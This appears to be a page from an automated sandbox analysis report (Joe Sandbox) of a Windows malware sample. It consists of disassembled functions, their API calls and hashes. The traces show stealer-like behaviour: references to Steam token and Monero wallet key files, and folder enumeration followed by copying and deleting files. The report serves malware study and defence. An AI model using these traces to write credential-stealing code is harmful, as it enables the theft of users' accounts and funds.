Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 48c10c02933b1988dfc5e38fc45967c4651010e676eee47a84f042808536ca0e
Instruction ID: 1bb68ecd843224dd67e6518947574122e3c632837f512be6d1c66fa3b8f08b34
Opcode Fuzzy Hash: 48c10c02933b1988dfc5e38fc45967c4651010e676eee47a84f042808536ca0e
Instruction Fuzzy Hash: 76F0BF71950108B6EF09F7B0DC5A9ED773C9A94380F808165B85B52492EF2D6619C7E3

Function 00777ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00780E2C), ref: 00777F00
wsprintfA.USER32 ref: 00777F16

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 4d26f55b0cf9f2b3f23726bc9073160b89824e5aa158d10facefcd547b2e33ca
Instruction ID: 6cb060600b6497b7830e17c2a4d0b1f8ca538b33fcc586647a40102808adb550
Opcode Fuzzy Hash: 4d26f55b0cf9f2b3f23726bc9073160b89824e5aa158d10facefcd547b2e33ca
Instruction Fuzzy Hash: D1F090F1A44208EBCB14DF84DC45FAAF7BCFB49B24F00466AF515A2280D7796904CBE1

Function 0076B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

lstrlen.KERNEL32(00000000), ref: 0076B9C2
lstrlen.KERNEL32(00000000), ref: 0076B9D6

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 64b26c2d7600630b35818356ee48e6f049cb6ff9669df055c1929166e7dc980c
Instruction ID: 000cbc20946dc507874e6ee80c4b07b45989f80abc4474c62cf9dbce5e547d2b
Opcode Fuzzy Hash: 64b26c2d7600630b35818356ee48e6f049cb6ff9669df055c1929166e7dc980c
Instruction Fuzzy Hash: 89E1E672910118EBEF05FBA0CC59DEE7378AF94340F408569F51B66091EF386A59CFA2

Function 0076AEF0 Relevance: 2.7, APIs: 2, Instructions: 236stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

lstrlen.KERNEL32(00000000), ref: 0076B16A
lstrlen.KERNEL32(00000000), ref: 0076B17E

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 488915184e9976f621292e84600e2bc84c3183678080b9e4d03c7c1d3356dd54
Instruction ID: 6128ee0aa0eb9953edf6049b924546180eda2b11fa0e4f2dbe4001a5314bf04c
Opcode Fuzzy Hash: 488915184e9976f621292e84600e2bc84c3183678080b9e4d03c7c1d3356dd54
Instruction Fuzzy Hash: 3B91F371910108EBEF05FBA0DC59DEE7378AF95340F408169F51BA6091EF386A59CBA3

Function 0076B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0077A740: lstrcpy.KERNEL32(00780E17,00000000), ref: 0077A788

Part of subcall function 0077A9B0: lstrlen.KERNEL32(?,01259048,?,\Monero\wallet.keys,00780E17), ref: 0077A9C5
Part of subcall function 0077A9B0: lstrcpy.KERNEL32(00000000), ref: 0077AA04
Part of subcall function 0077A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0077AA12

Part of subcall function 0077A920: lstrcpy.KERNEL32(00000000,?), ref: 0077A972
Part of subcall function 0077A920: lstrcat.KERNEL32(00000000), ref: 0077A982

Part of subcall function 0077A8A0: lstrcpy.KERNEL32(?,00780E17), ref: 0077A905

lstrlen.KERNEL32(00000000), ref: 0076B42E
lstrlen.KERNEL32(00000000), ref: 0076B442

Part of subcall function 0077A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0077A7E6

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: d1564281be547085b2ba029b4c56ad5999efc70b7b8ff298e4f0dc8983123c07
Instruction ID: f0c9870285580699463ee985af026843863ab69be173e6f784cb3cb915f74aed
Opcode Fuzzy Hash: d1564281be547085b2ba029b4c56ad5999efc70b7b8ff298e4f0dc8983123c07
Instruction Fuzzy Hash: 1D710371910104EBEF05FBA0DC5ADEE7378BF95340F408528F51BA6191EF386A19CBA2

Function 00774BB0 Relevance: 2.6, APIs: 2, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00778DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00778E0B

lstrcat.KERNEL32(?,00000000), ref: 00774BEA
lstrcat.KERNEL32(?,0125D8F0), ref: 00774C08

Part of subcall function 00774910: wsprintfA.USER32 ref: 0077492C
Part of subcall function 00774910: FindFirstFileA.KERNEL32(?,?), ref: 00774943

Part of subcall function 00774910: StrCmpCA.SHLWAPI(?,00780FDC), ref: 00774971
Part of subcall function 00774910: StrCmpCA.SHLWAPI(?,00780FE0), ref: 00774987
Part of subcall function 00774910: FindNextFileA.KERNEL32(000000FF,?), ref: 00774B7D
Part of subcall function 00774910: FindClose.KERNEL32(000000FF), ref: 00774B92

Part of subcall function 00774910: wsprintfA.USER32 ref: 007749B0
Part of subcall function 00774910: StrCmpCA.SHLWAPI(?,007808D2), ref: 007749C5
Part of subcall function 00774910: wsprintfA.USER32 ref: 007749E2
Part of subcall function 00774910: PathMatchSpecA.SHLWAPI(?,?), ref: 00774A1E
Part of subcall function 00774910: lstrcat.KERNEL32(?,0125E968), ref: 00774A4A
Part of subcall function 00774910: lstrcat.KERNEL32(?,00780FF8), ref: 00774A5C
Part of subcall function 00774910: lstrcat.KERNEL32(?,?), ref: 00774A70
Part of subcall function 00774910: lstrcat.KERNEL32(?,00780FFC), ref: 00774A82
Part of subcall function 00774910: lstrcat.KERNEL32(?,?), ref: 00774A96
Part of subcall function 00774910: CopyFileA.KERNEL32(?,?,00000001), ref: 00774AAC
Part of subcall function 00774910: DeleteFileA.KERNEL32(?), ref: 00774B31

Part of subcall function 00774910: wsprintfA.USER32 ref: 00774A07

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID:
API String ID: 2104210347-0
Opcode ID: 80502d0576488e3c965569e7a5e6cd5d5ffad8021092e71a6b932f1161a3ec53
Instruction ID: 09824ccda41efc276f509067c72882b0e6ec74ff835f253a214f90b5098fc854
Opcode Fuzzy Hash: 80502d0576488e3c965569e7a5e6cd5d5ffad8021092e71a6b932f1161a3ec53
Instruction Fuzzy Hash: B041CCB6504104ABCB94F760EC4ADFE733D9B89340F408908B64A57186EE795B98CBD2

Function 00766660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00003000,00000040), ref: 00766706
VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00766753

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000842000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000905000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000092B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000009AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.00000000009BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000B49000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C23000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C47000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637654311.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637873232.0000000000C5E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637973302.0000000000DFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637987951.0000000000DFD000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_file.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 50cf5234f1ec7efdd27a2501603f30035ed603e4032f7337da14314939236d76
Instruction ID: b8f36d940340be98f71836c47dd7d33388e14f43e78f7c89ba45e538c0147975
Opcode Fuzzy Hash: 50cf5234f1ec7efdd27a2501603f30035ed603e4032f7337da14314939236d76
Instruction Fuzzy Hash: 1141DB74A00209EFCB44CF58C494BADBBB1FF48314F6482A9E95A9B355D735EA81CF84

Function 00775050 Relevance: 2.5, APIs: 2, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00778DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00778E0B

lstrcat.KERNEL32(?,00000000), ref: 0077508A
lstrcat.KERNEL32(?,0125E320), ref: 007750A8

Part of subcall function 00774910: wsprintfA.USER32 ref: 0077492C
Part of subcall function 00774910: FindFirstFileA.KERNEL32(?,?), ref: 00774943

Memory Dump Source

Source File: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1637299846.0000000000760000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.00000000007F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.0000000000811000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1637318654.000000000081D000.00000040.00000001.01000000.00000003.sdmpDownload File
